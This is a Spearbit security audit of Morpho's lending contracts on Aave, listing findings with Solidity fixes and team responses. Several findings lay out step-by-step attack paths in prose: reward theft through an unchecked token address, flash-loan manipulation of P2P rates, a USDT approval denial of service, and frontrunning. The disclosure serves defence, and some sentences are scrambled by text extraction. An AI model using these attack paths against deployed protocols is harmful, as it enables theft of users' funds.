Morpho: Fixed in PR 34. Spearbit: Fixed. 5.6 Informational +5.6.1 Consider reverting the supplyCollateralLogic execution when amount.rayDivDown(poolSupplyIndex) is equal to zero Severity: Informational Context: PositionsManagerInternal.sol#L411-L426, PositionsManagerInternal.sol#L512 Description: In Aave, when an AToken/VariableDebtToken is minted or burned, the transaction will revert if the amount divided by the index is equal to zero. You can see the check in the implementation of _mintScaled and _burnScaled functions in the Aave codebase. Morpho, with PR 688, has decided to prevent supply to the pool in this scenario to avoid a revert of the operation. Before the PR, if the user had supplied an amount for which amount.rayDivDown(poolSupplyIndex) would be equal to zero, the operation would have reverted at the Aave level during the mint operation of the AToken. With the PR, the operation will proceed because the supply to the Aave pool is skipped (see PoolLib.supplyToPool). Allowing this scenario in this specific context for the supplyCollateralLogic function will bring the following side effects: • The supplied user's amount will remain in Morpho's contract and will not be supplied to the Aave pool. • The user's accounting system is not updated because collateralBalance is increased by amount.rayDivDown(poolSupplyIndex) which is equal to zero. 21 • If the marketBalances.collateral[onBehalf] was equal to zero (the user has never supplied the underly- ing to Morpho) the underlying token would be wrongly added to the _userCollaterals[onBehalf] storage, even if the amount supplied to Morpho (and to Aave) is equal to zero. • The user will not be able to withdraw the provided amount because the amount has not been accounted for in the storage. • Events.CollateralSupplied event is emitted even if the amount (used as an event parameter) has not been accounted to the user. Recommendation: Consider reverting the supplyCollateral and supplyCollateralWithPermit operations when amount.rayDivDown(poolSupplyIndex) is equal to zero. Morpho: We won't change the current code for the following reasons: • Rounding down allows to do the accounting in favor of the protocol instead of the user which is the safer option. • The error is bounded by 1 WEI of scaled balance and computations are already not precise to the WEI (even for scaled balances). Index being in the order of magnitudes of 1-10 RAY, the final error is bounded by 10 wei. • It's a bit annoying that the market would be added to the list of collaterals of the user but I'd say that the user can easily prevent that by not supplying negligible amounts to Morpho (which do not make sense for a user anyway). Spearbit: Acknowledged. +5.6.2 WETHGateway does not validate the constructor's input parameters Severity: Informational Context: WETHGateway.sol#L31 Description: The current implementation of the WETHGateway contracts does not validate the user's parameters during the constructor. In this specific case, the constructor should revert if morpho address is equal to ad- dress(0). Recommendation: Morpho should add sanity checks related to the user's input parameters, preventing the con- tract from being successfully created if they do not pass the validation. In this specific case, the constructor should revert if morpho address is equal to address(0). Morpho: Recommendation implemented in PR 601. Spearbit: Verified. +5.6.3 Missing/wrong natspec, typos, minor refactors and renaming of variables to be more meaningful Severity: Informational Context: See below Description: In general, the current codebase does not cover all the functions, events, structs, or state variables with proper natspec. Below you can find a list of small specific improvements regarding typos, missing/wrong natspec, or suggestions to rename variables to a more meaningful/correct name • RewardsManager.sol#L28: consider renaming the balance variable in UserAssetBalance to scaledBalance • PositionsManagerInternal.sol#L289-L297, PositionsManagerInternal.sol#L352-L362: consider better docu- menting this part of the code because at first sight it's not crystal clear why the code is structured in this way. For more context, see the PR comment in the spearbit audit repo linked to it. 22 • MorphoInternal.sol#L469-L521: consider moving the _calculateAmountToSeize function from MorphoInt- ernal to PositionsManagerInternal contract. This function is only used internally by the PositionsMan- agerInternal. Note that there could be more instances of these kinds of "refactoring" of the code inside other contracts. Recommendation: Consider carefully updating/adding natspec for each function, event, struct, custom error, and state variable to have complete documentation of your code. This operation will be beneficial for Morpho developers, integrators and auditors. Consider also implementing the suggestions regarding the issues found in the current natspec or variable renam- ing. Morpho: Part of the recommendations have been implemented in the PR 621. Spearbit: The Morpho team has stated that all the missing/wrong natspec comments will be handled in a different PR. The Morpho team should consider reviewing the codebase to find other possible function that could be "bubbled up" to have a more clean codebase. +5.6.4 No validation checks on the newDefaultIterations struct Severity: Informational Context: Morpho.sol#L49 Description: The initialize function takes in a newDefaultIterations struct and does not perform validation for any of its fields. Recommendation: Consider validating at least a max value to avoid undesirable behavior if no matches occur in time. Morpho: We won't implement it. It's up to the governance to set relevant values. If Morpho is wrongly initialized it can still be updated later and it's not clear what would be a correct "max value" either. Spearbit: Acknowledged. +5.6.5 No validation check for newPositionsManager address Severity: Informational Context: Morpho.sol#L48 Description: The initialize function does not ensure that the newPositionsManager is not a 0 address. Recommendation: Proper validation should be added to the newPositionsManager argument and the function should revert if it is indeed a 0 address. Morpho: We don't think it's worth it. Either the DAO can redeploy another instance of Morpho or set the position- sManager to the correct address later on using the setter. Spearbit: Acknowledged. 23 +5.6.6 Missing Natspec function documentation Severity: Informational Context: PositionsManager.sol#L128-L132 Description: The repayLogic function currently has Natspec documentation for every function argument except for the repayer argument. Recommendation: Natspec documentation should be added for the repayer function argument on the repay- Logic function. Morpho: Fixed in PR 634. Spearbit: Fixed. +5.6.7 approveManagerWithSig user experience could be improved Severity: Informational Context: Morpho.sol#L250 Description: With the current implementation of the approveManagerWithSig signers must wait that the previous signers have consumed the nonce to be able to call approveManagerWithSig. Inside the function, there's a specific check that will revert if the signature has been signed with a nonce that is not equal to the current one assigned to the delegator, this means that signatures that use "future" nonce will not be able to be approved until previous nonce has been consumed. uint256 usedNonce = _userNonce[signatory]++; if (nonce != usedNonce) revert Errors.InvalidNonce(); Let's make an example: delegator want to allow 2 managers via signature 1) Generate sig_0 for manager1 with nonce_0. 2) Generate sig_1 for manager2 with nonce_1. 3) If no-one executes approveManagerWithSig(sig_0) the sig_1 (and all the signatures based on incremented nonces) cannot be executed. It's true that at some point someone/the signer will execute it. Recommendation: If this is an acceptable behavior, consider documenting it and explaining to the delegator which are the possible limitation of the process. Morpho: I believe that this should be considered intended behavior. Alternative behaviors create uncertainty as to what order signatures would be consumed, and this could be problematic if, for example, a user has signatures for both approving and unapproving a manager. Spearbit: Acknowledged. +5.6.8 Consider hardcoding msg.sender as the from parameter for certain actions Severity: Informational Context: Morpho.sol#L283 Description: The following Morpho functions have a from field that is always set to msg.sender: _supply, _- supplyCollateral, _repay (and liquidate's liquidator). Generally, a parameter that is always set to the same value does not need to be a parameter and can be hardcoded further down the call graph. However, this might make the code easier to understand in certain circumstances. In this case, we believe that removing the mentioned parameters and directly using msg.sender in the delegate-called PositionManager *Logic functions makes the code easier to reason about. The from parameter has important security considerations as it is used as the owner in an ERC20.transferFrom call and, unlike borrow or withdraw, does not validate this parameter with a _validatePermission call. Therefore these functions are only secure when called with from=msg.sender and 24 removing the parameter avoids having to analyze all call sites. Additionally, it will lead to gas improvements as the calldata is reduced. Morpho: The "from" parameter is quite useful if we want to implement something like meta transactions in the future which is why we added it. We are not including this in the initial release, but we have talked about it internally at length and I don't think it's much extra gas to have this extra calldata that would make this potential feature much easier to implement. Spearbit: Acknowledged. +5.6.9 Missing user markets check when liquidating Severity: Informational Context: PositionsManager.sol#L238 Description: The liquidation does not check if the user who gets liquidated actually joined the collateral and borrow markets. Recommendation: Instead of setting the repayment amount to zero and continuing with the zero liquidation, consider reverting if the user is not in the markets. Morpho: liquidateLogic now reverts for both the repay and seized amount of zero. fixed here PR 629. Spearbit: Fixed. +5.6.10 Consider reverting instead of returning zero inside repayLogic, withdrawLogic, withdrawCollater- alLogic and liquidateLogic function Severity: Informational Context: PositionsManager.sol#L142, PositionsManager.sol#L174, PositionsManager.sol#L204, PositionsMan- ager.sol#L249 Description: Position manager always checks the user inputs via different validation functions. One of the vali- dations is that the input's amount must be greater than zero, otherwise, the transaction reverts with revert Er- rors.AmountIsZero(). The same behavior is not followed in those cases where the re-calculated amount is still zero. For example, in repayLogic after re-calculating the max amount that can be repaid by executing amount = Math.min(_getUserBorrowBalanceFromIndexes(underlying, onBehalf, indexes), amount); In this case, Morpho simply executes if (amount == 0) return 0; Note that liquidateLogic should be handled differently because both the borrow amount and/or the collateral amount could be equal to zero. In this case, it would be better to revert with a different custom error based on which of the two amounts are equal to zero. Recommendation: Consider reverting, with a specific error code for each case, even when the re-calculated amount is equal to zero instead of simply returning zero. Morpho: Recommendation implemented in PR 629. Spearbit: Fixed. 25 +5.6.11 PERMIT2 operations like transferFrom2 and simplePermit2 will revert if amount is greater than type(uint160).max Severity: Informational Context: Morpho.sol#L90-L92, Morpho.sol#L121-L123, Morpho.sol#L166-L168, PositionsManager.sol#L62, Po- sitionsManager.sol#L87, PositionsManager.sol#L144, PositionsManager.sol#L251 Description: Both Morpho.sol and PositionsManager.sol uses the Permit2 lib. The current implementation of the permit2 lib explicitly restricts the amount of token to uint160 by calling amount.toUint160() On Morpho, the amount is expressed as a uint256 and the user could, in theory, pass an amount that is greater than type(uint160).max. By doing so, the transaction would revert when it interacts with the permit2 lib. Recommendation: Consider restricting the amount to uint160 or document the behavior as a natspec comment and on the documentation visible to the users and integrators. Morpho: I don't think a fix for this is necessary as long as the transaction reverts properly. Spearbit: Acknowledged. +5.6.12 Both _wrapETH and _unwrapAndTransferETH do not check if the amount is zero Severity: Informational Context: WETHGateway.sol#L95, WETHGateway.sol#L100-L101 Description: Both _wrapETH and _unwrapAndTransferETH are not checking if the amount amount of tokens is greater than zero. If the amount is equal to zero, Morpho should avoid making the external call or simply revert. Recommendation: Avoid execution of the external call to the WETH contract or revert if the amount is equal to zero. Morpho should anyway consider monitoring these events because each interaction with Morpho should always return an amount of token greater than zero. Morpho: The recommendation has been implemented in PR 655. In Spearbit: Fixed. Morpho has decided to revert when the amount wrapped/unwrapped is equal to zero. the integrator docs, Morpho should make the integrators aware of this behavior for the borrowETH, withdrawETH, and withdrawCollateralETH. In those specific cases, the integrators have to handle the possible revert with a try/catch to not make the whole tx fail. +5.6.13 Document further contraints on BucketDLL's insert and remove functions Severity: Informational Context: BucketDLL.sol#L49, BucketDLL.sol#L67 Description: Besides the constraint that id may not be zero, there are further constraints that are required for the insert and remove functions to work correctly: • insert: "This function should not be called with an _id that is already in the list." Otherwise, it would overwrite the existing _id. • remove: "This function should not be called with an _id that is not in the list." Otherwise, it would set all of _list.accounts[0] to address(0), i.e., mark the list as empty. Recommendation: Consider adding these two constraints as @dev comments next to the "This function should not be called with _id equal to address 0." constraint. 26 /// @dev This function should not be called with `_id` equal to address 0. + /// @dev This function should not be called with an `_id` that is not in the list. function remove(List storage _list, address _id) internal returns (bool) { ... } /// @dev This function should not be called with `_id` equal to address 0. + /// @dev This function should not be called with an `_id` that is already in the list. function insert( List storage _list, address _id, bool _head ) internal returns (bool) { ... } Morpho: Addressed in PR 34. Spearbit: Fixed. 27 diff --git a/findings_newupdate/spearbit/Morpho-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Morpho-Spearbit-Security-Review.txt new file mode 100644 index 0000000..e20af40 --- /dev/null +++ b/findings_newupdate/spearbit/Morpho-Spearbit-Security-Review.txt @@ -0,0 +1,41 @@ +5.1.1 Wrong P2P exchange rate calculation Severity: Critical Risk Context: MarketsManagerForAave.sol#L436 Description: _p2pDelta is divided by _poolIndex and multiplied by _p2pRate, nevertheless it should have been multiplied by _poolIndex and divided by _p2pRate to compute the correct share of the delta. This leads to wrong P2P rates throughout all markets if supply / borrow delta is involved. Recommendation: Change order and adjust return values accordingly. uint256 shareOfTheDelta = _p2pDelta .wadToRay() .rayMul(_p2pRate) .rayDiv(_poolIndex) .rayMul(_poolIndex) .rayDiv(_p2pRate) .rayDiv(_p2pAmount.wadToRay()); - - + + Morpho: Fixed in PR #536, _computeNewP2PExchangeRate is changed as recommended. Spearbit: Acknowledged. +5.1.2 MatchingEngineForAave is using the wrong totalSupply in updateBorrowers Severity: Critical Risk Context: MatchingEngineForAave.sol#L376-L385 Description: _poolTokenAddress is referencing AToken so the totalStaked would be the total supply of the AToken. In this case, the totalStaked should reference the total supply of the DebtToken, otherwise the user would be rewarded for a wrong amount of reward. Recommendation: Use the correct token address to query scaledTotalSupply as follows: address variableDebtTokenAddress = lendingPool .getReserveData(IAToken(_poolTokenAddress).UNDERLYING_ASSET_ADDRESS()) .variableDebtTokenAddress; uint256 totalStaked = IScaledBalanceToken(variableDebtTokenAddress).scaledTotalSupply(); Spearbit: Fixed, recommendation was implemented in the PR #554 +5.1.3 RewardsManagerAave does not verify token addresses Severity: Critical Risk Context: RewardsManagerForAave.sol#L145-L147 Description: Aave has 3 different types of tokens: aToken, stable debt token and variable debt token (a/s/vToken). Aave’s incentive controller can define rewards for all of them but Morpho never uses a stable-rate borrows token (sToken). The public accrueUserUnclaimedRewards function allows passing arbitrary token addresses for which to accrue user rewards. Current code assumes that if the token is not the variable debt token, then it must be the aToken, and uses the user’s supply balance for the reward calculation as follows: 5 uint256 stakedByUser = reserve.variableDebtTokenAddress == asset ? positionsManager.borrowBalanceInOf(reserve.aTokenAddress, _user).onPool : positionsManager.supplyBalanceInOf(reserve.aTokenAddress, _user).onPool; An attacker can accrue rewards by passing in an sToken address and steal from the contract, i.e: • Attacker supplies a large amount of tokens for which sToken rewards are defined. • The aToken reward index is updated to the latest index but the sToken index is not initialized. • Attacker calls accrueUserUnclaimedRewards([sToken]), which will compute the difference between the cur- rent Aave reward index and user’s sToken index, then multiply it by their supply balance. • The user accumulated rewards in userUnclaimedRewards[user] can be withdrawn by calling PositionMan- ager.claimRewards([sToken, ...]). • Attacker withdraws their supplied tokens again. The abovementioned steps can be performed in one single transaction to steal unclaimed rewards from all Morpho positions. Recommendation: Verify the token address to be either an aToken or vToken. function accrueUserUnclaimedRewards(address[] calldata _assets, address _user) { // ... for (uint256 i = 0; i < _assets.length; i++) { address asset = _assets[i]; DataTypes.ReserveData memory reserve = lendingPool.getReserveData( IGetterUnderlyingAsset(asset).UNDERLYING_ASSET_ADDRESS() ); uint256 stakedByUser = reserve.variableDebtTokenAddress == asset ? positionsManager.borrowBalanceInOf(reserve.aTokenAddress, _user).onPool : positionsManager.supplyBalanceInOf(reserve.aTokenAddress, _user).onPool; uint256 stakedByUser; if (reserve.variableDebtTokenAddress == asset) { stakedByUser = positionsManager.borrowBalanceInOf(reserve.aTokenAddress, _user).onPool; } else { require(reserve.aTokenAddress == asset, "invalid asset"); stakedByUser = positionsManager.supplyBalanceInOf(reserve.aTokenAddress, _user).onPool; } // ... - - - + + + + + + + } } Morpho: Fixed, the recommendation has been implemented in PR #554 Spearbit: Acknowledged. 6 5.2 High Risk +5.2.1 FullMath requires overflow behavior Severity: High Risk Context: FullMath.sol#L2 Description: UniswapV3’s FullMath.sol is copied and migrated from an old solidity version to version 0.8 which reverts on overflows but the old FullMath relies on the implicit overflow behavior. The current code will revert on overflows when it should not, breaking the SwapManagerUniV3 contract. Recommendation: Use the official FullMath.sol 0.8 branch that wraps the code in an unchecked statement. See #40. Spearbit: Fixed, the Uniswap V3 branch is added as a dependency in the PR #550 +5.2.2 Morpho’s USDT mainnet market can end up in broken state Severity: High Risk Context: PositionsManagerForAaveLogic.sol#L502 Description: Note that USDT on Ethereum mainnet is non-standard and requires resetting the approval to zero (see USDT L199) before being able to change it again. In _repayERC20ToPool , it could be that _amount is approved but then _amount = Math.min(...) only repays a smaller amount, meaning there remains a non-zero approval for Aave. Any further _repayERC20ToPool/_- supplyERC20ToPool calls will then revert in the approve call. Users cannot interact with most functions of the Morpho USDT market anymore. Example: Assume the attacker is first to borrow from the USDT market on Morpho. • Attacker borrows 1000 USDT through Morpho from the Aave pool (and some other collateral to cover the debt). • Attacker directly interacts with Aave to repay 1 USDT of debt for Aave’s Morpho account position. • Attacker attempts to repay 1000 USDT on Morpho. the contract’s debt balance is only 999 and the _amount = Math.min(_amount, variableDebtTo- ken.scaledBalanceOf(address(this)).mulWadByRay(_normalizedVariableDebt) computation will only repay 999. An approval of 1 USDT remains. It will approve 1000 USDT but • The USDT market is broken as it reverts on supply / repay calls when trying to approve the new amount Recommendation: In _repayERC20ToPool/_supplyERC20ToPool do a safeApprove(0) first before the approval or ensure that the exact approved amount is always transferred by Aave, resetting the allowance to zero this way. Morpho: This is fixed (not in the PR closed). Now we approve only what will be paid to Aave and no more. So after repay the allowance will always be 0. Spearbit: Acknowledged. 7 +5.2.3 Wrong reserve factor computation on P2P rates Severity: High Risk Context: MarketsManagerForAave.sol#L413-L418 Description: The reserve factor is taken on the entire P2P supply and borrow rates instead of just on the spread of the pool rates. It’s currently overcharging suppliers and borrowers and making it possible to earn a worse rate on Morpho than the pool rates. supplyP2PSPY[_marketAddress] = (meanSPY * (MAX_BASIS_POINTS - reserveFactor[_marketAddress])) / MAX_BASIS_POINTS; borrowP2PSPY[_marketAddress] = (meanSPY * (MAX_BASIS_POINTS + reserveFactor[_marketAddress])) / MAX_BASIS_POINTS; Recommendation: Fix the computation. Morpho: The real reserve factor should apply only on the spread so you’re right that this formula is wrong and needs to be updated. a + (1/2 +- f)(b-a) where f is the reserve factor. Spearbit: Acknowledged, fixed in PR #565. +5.2.4 SwapManager assumes Morpho token is token0 of every token pair Severity: High Risk Context: SwapManagerUniV2.sol#L106 Description: The consult function wrongly assumes that the Morpho token is always the first token (token0) in the Morpho <> Reward token token pair. This could lead to inverted prices and a denial of service attack when claiming rewards as the wrongly calculated expected amount slippage check reverts. Recommendation: Consider using similar code to the example UniswapV2 oracle. Note that depending on how this issue is fixed in consult, the caller of this function needs to be adjusted as well to return a Morpho token amount as amountOut. Morpho: Fixed in PR #585. Spearbit: Acknowledged. +5.2.5 SwapManager fails at updating TWAP Severity: High Risk Context: SwapManagerUniV2.sol#L83-L85 Description: The update function returns early without updating the TWAP if the elapsed time is past the TWAP period. Meaning, once the TWAP period passed the TWAP is stale and forever represents an old value. This could lead to a denial of service attack when claiming rewards as the wrongly calculated expected amount slippage check reverts. Recommendation: Fix the code: // ensure that at least one full period has passed since the last update - if (timeElapsed >= PERIOD) { + if (timeElapsed < PERIOD) { return; } Morpho: Fixed in PR #550 Spearbit: Acknowledged. 8 +5.2.6 P2P rate can be manipulated as it’s a lazy-updated snapshot Severity: High Risk Context: MarketsManagerForAave.sol#L408-L411 Description: The P2P rate is lazy-updated upon interactions with the Morpho protocol. It takes the mid-rate of It’s possible to manipulate these rates before triggering an update on the current Aave supply and borrow rate. Morpho. function _updateSPYs(address _marketAddress) internal { DataTypes.ReserveData memory reserveData = lendingPool.getReserveData( IAToken(_marketAddress).UNDERLYING_ASSET_ADDRESS() ); uint256 meanSPY = Math.average( reserveData.currentLiquidityRate, reserveData.currentVariableBorrowRate ) / SECONDS_PER_YEAR; // In ray } Example: Assume an attacker has a P2P supply position on Morpho and wants to earn a very high APY on it. He does the following actions in a single transaction: • Borrow all funds on the desired Aave market. (This can be done by borrowing against flashloaned collateral). • The utilisation rate of the market is now 100%. The borrow rate is the max borrow rate and the supply rate is (1.0 - reserveFactor) * maxBorrowRate. The max borrow rate can be higher than 100% APY, see Aave docs. • The attacker triggers an update to the P2P rate, for example, by supplying 1 token to the pool Positions- ManagerForAave.supply(poolTokenAddress, 1, ...), triggering marketsManager.updateSPYs(_poolTo- kenAddress). • The new mid-rate is computed which will be (2.0 - reserveFactor) * maxBorrowRate / 2 ~ maxBor- rowRate. • The attacker repays their Aave debt in the same transaction, not paying any interest on it. • All P2P borrowers now pay the max borrow rate to the P2P suppliers until the next time a user interacts with the market on Morpho. • This process can be repeated to keep the APY high. Recommendation: Consider using a time-weighted mid-rate instead of trusting the current value. Create an oracle contract that is triggered by the protocol administrators to compute the running TWAR (Time-Weighted- Average-Rate) of Aave. Also, ensure that the P2P rate used by the protocol is updated often (updateSPYs) to not diverge from the Aave pool rate. This can be bad in low-activity markets where a high APY is locked in and no P2P update rate is triggered for a long time period. Morpho: How can this kind of attack be profitable if there is a bot that update rates after such tx? I mean it can only be a griefing attack, right? In the case the user has enough capital to harm Morpho, the user only needs to pay the gas of tx nothing else so it would end up in the same situation no? The drawback of a TWAP would be to unsynch Morpho from the real P2P which can lead other major issues. Spearbit: You can’t assume that there isn’t such bot and even if there is, you can’t assume that the sync always perfectly ends up in the same block as the attack transaction. Because even if the syncing ends up in the next block you’d still pay high interest for 1 block. This attack only costs gas fees, they can take 0%-fee flashloans (flashmint DAI, turn it to aDAI supply) and then borrow against it. The borrow also doesn’t come with any interest because it’s repaid in the same block. It’s a griefing attack if the attacker does not have their own supply position on Morpho, but as soon as they have a supply position it’s very likely to be profitable because they only pay gas fees but earn high APR. 9 Morpho’s P2P rate is already different from the real Aave mid-rate because it isn’t updated every block to reflect changes in Aave’s mid-rate. (That’s what I mean by lazy-updated snapshot and "Also, ensure that the P2P rate the protocol uses is updated often (updateSPYs) to not diverge from the Aave pool rate.") It doesn’t actually have to be time-weighted, it could just be an oracle that also stores the current aave mid-rate but these updates couldn’t be manipulated by an attacker as they can only be triggered by admins. Morpho: We are working on a completely new way to manage exchanges rates. The idea is to delete Morpho’s midrate, and update our exchange rates with a formula that only depends on the pool’s exchanges rates (and not the rate, to avoid manipulations). Associated fix in #PR 601. Spearbit: Acknowledged. +5.2.7 Liquidating Morpho’s Aave position leads to state desynchronization Severity: High Risk Context: PositionsManagerForAaveGettersSetters.sol#L208-L219 Description: Morpho has a single position on Aave that encompasses all of Morpho’s individual user positions that are on the pool. When this Aave Morpho position is liquidated the user position state tracked in Morpho desynchronize from the actual Aave position. This leads to issues when users try to withdraw their collateral or repay their debt from Morpho. It’s also possible to double-liquidate for a profit. Example: There’s a single borrower B1 on Morpho who is connected to the Aave pool. • B1 supplies 1 ETH and borrows 2500 DAI. This creates a position on Aave for Morpho • The ETH price crashes and the position becomes liquidatable. • A liquidator liquidates the position on Aave, earning the liquidation bonus. They repaid some debt and seized some collateral for profit. • This repaid debt / removed collateral is not synced with Morpho. The user’s supply and debt balance remain 1 ETH and 2500 DAI. The same user on Morpho can be liquidated again because Morpho uses the exact same liquidation parameters as Aave. • The Morpho liquidation call again repays debt on the Aave position and withdraws collateral with a second liquidation bonus. • The state remains desynced. Recommendation: Liquidating the Morpho position should not break core functionality for Morpho users. Morpho: This issue can be prevented by sending, at the beginning at least, aTokens on behalf of Morpho and set it as collateral to prevent this issue. Also we will run our own liquidation bots. We will not implement any "direct" fix inside the code. Spearbit: Acknowledged, no direct fixes have been implemented. 10 5.3 Medium Risk +5.3.1 Frontrunners can exploit the system by not allowing head of DLL to match in P2P Severity: Medium Risk Context: MatchingEngineForAave.sol Description: For a given asset X, liquidity is supplied on the pool since there are not enough borrowers. suppli- ersOnPool head: 0xa with 1000 units of x Whenever there is a new transaction in the mempool to borrow 100 units of x: • Frontrunner supplies 1001 units of x and is supplied on pool. • updateSuppliers will place the frontrunner on the head (assuming very high gas is supplied). • Borrower’s transaction lands and is matched 100 units of x with a frontrunner in p2p. • Frontrunner withdraws the remaining 901 left which was on the underlying pool. Favorable conditions for an attack: • Relatively fewer gas fees & relatively high block gas limit. • insertSorted is able to traverse to head within block gas limit (i.e length of DLL). Since this is a non-atomic sandwich, the frontrunner needs excessive capital for a block’s time period. Recommendation: Consider sandwich attack mitigations. Morpho: We acknowledge this issue and we are currently searching for better matching engine mechanisms. Though, as we must prevent the protocol from DDOs attacks a classic FIFO is not possible. We’ll keep the matching engine like it is for as the result of the front-running attack you mentioned is similar to a whale with huge capital which would be at the head of the list. Spearbit: Acknowledged, matching engine remains unchanged. +5.3.2 TWAP intervals should be flexible as per market conditions Severity: Medium Risk Context: SwapManagerUniV3.sol#L140-L149 Description: The protocol is using the same TWAP_INTERVAL for both weth-morpho and weth-reward token pool while their liquidity and activity might be different. It should use separate appropriate values for both pools. Recommendation: TWAP_INTERVAL value should be changeable (and not constant) by the admin/owner since it is dependent upon market conditions and activity (for e.g 1-hour twap might lag considerably in sudden movements). Morpho: Valid issue, will fix. Spearbit: Recommendation has been followed in the PR #557 11 +5.3.3 PositionsManagerForAave claimToTreasury could allow sending underlying to 0x address Severity: Medium Risk Context: PositionsManagerForAave.sol#L223-L232 Description: claimToTreasury is currently not verifying if the treasuryVault address is != address(0). In the current state, it would allow the owner of the contract to burn the underlying token instead of sending it to the intended treasury address. Recommendation: Add a check to prevent sending treasury underlying tokens to address(0) and verify that the amountToClaim is != 0 to prevent wasting gas and emitting a “false” event. function claimToTreasury(address _poolTokenAddress) external onlyOwner isMarketCreatedAndNotPaused(_poolTokenAddress) { + + } require(treasuryVault != address(0), "treasuryVault != address(0)"); ERC20 underlyingToken = ERC20(IAToken(_poolTokenAddress).UNDERLYING_ASSET_ADDRESS()); uint256 amountToClaim = underlyingToken.balanceOf(address(this)); require(amountToClaim != 0, "amountToClaim != 0"); underlyingToken.safeTransfer(treasuryVault, amountToClaim); emit ReserveFeeClaimed(_poolTokenAddress, amountToClaim); Morpho: Fixed in PR #562. Spearbit: Acknowledged. +5.3.4 rewardsManager used in MatchingEngineForAave could be not initialized Severity: Medium Risk Context: MatchingEngineForAave.sol#L380-L385, MatchingEngineForAave.sol#L410-L415 Description: MatchingEngineForAave update the userUnclaimedRewards for a supplier/borrower each time it gets updated. rewardsManager is not initialized in PositionsManagerForAaveLogic.initialize but only via Po- sitionsManagerForAaveGettersSetters.setRewardsManager, which means that it will start as address(0). Each time a supplier or borrower gets updated and the rewardsManager address is empty, the transaction will revert. To replicate the issue, just comment positionsManager.setRewardsManager(address(rewardsManager)); in TestSetup and run make c-TestSupply. All tests will fail with [FAIL. Reason: Address: low-level delegate call failed] Recommendation: Make sure to always call PositionsManagerForAaveGettersSetters.setRewardsManager after deploying and initializing PositionsManagerForAaveLogic or pass it directly in PositionsManagerForAaveL- ogic.initialize as a new parameter. Morpho: Check on address(rewardsManager) != address(0) has been implemented in PR #554 Spearbit: Acknowledged. 12 +5.3.5 Missing input validation checks on contract initialize/constructor Severity: Medium Risk Context: • MarketsManagerForAave.sol#L125-L130 • PositionsManagerForAaveLogic.sol#L24-L42 • RewardsManagerForAave.sol#L63-L66 • SwapManagerUniV2.sol#L54-L70 • SwapManagerUniV3.sol#L58-L85 • SwapManagerUniV3OnEth.sol#L65-L87 Description: Contract creation/initialization of a contract in a wrong/inconsistent state. initialize/constructor input parameters should always be validated to prevent the Recommendation: Consider implementing the following changes. MarketsManagerForAave.sol function initialize(ILendingPool _lendingPool) external initializer { + require(address(_lendingPool) != address(0), "input != address(0)"); __UUPSUpgradeable_init(); __Ownable_init(); lendingPool = ILendingPool(_lendingPool); } PositionsManagerForAaveLogic.sol Important note: _maxGas and NDS values should also be validated considering the following separated issues: • Low/high MaxGas values could make match/unmatch supplier/borrower functions always “fail” or revert #34 • NDS min/max value should be properly validated to avoid tx to always fail/skip loop #33 13 function initialize( IMarketsManagerForAave _marketsManager, ILendingPoolAddressesProvider _lendingPoolAddressesProvider, ISwapManager _swapManager, MaxGas memory _maxGas ) external initializer { + + ,! + require(address(_marketsManager) != address(0), "_marketsManager != address(0)"); require(address(_lendingPoolAddressesProvider) != address(0), "_lendingPoolAddressesProvider != address(0)"); require(address(_swapManager) != address(0), "_swapManager != address(0)"); __UUPSUpgradeable_init(); __ReentrancyGuard_init(); __Ownable_init(); maxGas = _maxGas; marketsManager = _marketsManager; addressesProvider = _lendingPoolAddressesProvider; lendingPool = ILendingPool(addressesProvider.getLendingPool()); matchingEngine = new MatchingEngineForAave(); swapManager = _swapManager; NDS = 20; } RewardsManagerForAave.sol constructor(ILendingPool _lendingPool, IPositionsManagerForAave _positionsManager) { require(address(_lendingPool) != address(0), "_lendingPool != address(0)"); require(address(_positionsManager) != address(0), "_positionsManager != address(0)"); lendingPool = _lendingPool; positionsManager = _positionsManager; + + } SwapManagerUniV2.sol constructor(address _morphoToken, address _rewardToken) { + + require(_morphoToken != address(0), "_morphoToken != address(0)"); require(_rewardToken != address(0), "_rewardToken != address(0)"); MORPHO = _morphoToken; REWARD_TOKEN = _rewardToken; /// ... } SwapManagerUniV3.sol Worth noting: • _morphoPoolFee should have a max value check • _rewardPoolFee should have a max value check 14 constructor( address _morphoToken, uint24 _morphoPoolFee, address _rewardToken, uint24 _rewardPoolFee ) { + + require(_morphoToken != address(0), "_morphoToken != address(0)"); require(_rewardToken != address(0), "_rewardToken != address(0)"); MORPHO = _morphoToken; MORPHO_POOL_FEE = _morphoPoolFee; REWARD_TOKEN = _rewardToken; REWARD_POOL_FEE = _rewardPoolFee; /// ... } SwapManagerUniV3OnEth.sol Worth noting: • _morphoPoolFee should have a max value check constructor(address _morphoToken, uint24 _morphoPoolFee) { + require(_morphoToken != address(0), "_morphoToken != address(0)"); MORPHO = _morphoToken; MORPHO_POOL_FEE = _morphoPoolFee; /// ... } Morpho: This more our responsibility to set our contracts properly at deployment so we don’t think this is much relevant to add these require knowing that the PositionsManager is already a large contract. However we agree that the 2 following issues are relevant: • Low/high MaxGas values could make match/unmatch supplier/borrower functions always “fail” or revert #34 • NDS min/max value should be properly validated to avoid tx to always fail/skip loop #33 Spearbit: Acknowledged. +5.3.6 Setting a new rewards manager breaks claiming old rewards Severity: Medium Risk Context: PositionsManagerForAaveGettersSetters.sol#L62 Description: Setting a new rewards manager will break any old unclaimed rewards as users can only claim through the PositionManager.claimRewards function which then uses the new reward manager. Recommendation: Be cautious when setting new reward managers and ideally ensure there aren’t any unclaimed usuer rewards. Morpho: Perhaps make this setter settable only once? And have another setter saying whether or not we should accrue rewards of users so that in the MatchingEngine we do not call the rewards manager if we already know there is no more liquidity mining. Spearbit: That is one way to solve it if you don’t need the migration behavior. Morpho: We decided to keep it as it is for now. Will warn users if we plan to change rewards manager. At the end we’ll need different reward managers. 15 Spearbit: Acknowledged, changes have not been made. +5.3.7 Low/high MaxGas values could make match/unmatch supplier/borrower functions always “fail” or revert Severity: Medium Risk Context: PositionsManagerForAaveGettersSetters.sol#L47-L50, PositionsManagerForAaveLogic.sol#L34 Description: maxGas variable is used to determine how much gas the matchSuppliers, unmatchSuppliers, matchBorrowers and unmatchBorrowers can consume while trying to match/unmatch supplier/borrower and also updating their position if matched. • maxGas = 0 will make entirely skip the loop. • maxGas low would make the loop run at least one time but the smaller maxGas is the higher is the possibility that not all the available suppliers/borrowers are matched/unmatched. • maxGas could make the loop consume all the block gas, making the tx revert. Note that maxGas can be overriden by the user when calling supply, borrow Recommendation: Make enough tests to determine a safe min/max value for maxGas Morpho: These parameters will be decided by governance in the future. We will implement a time-lock of seven 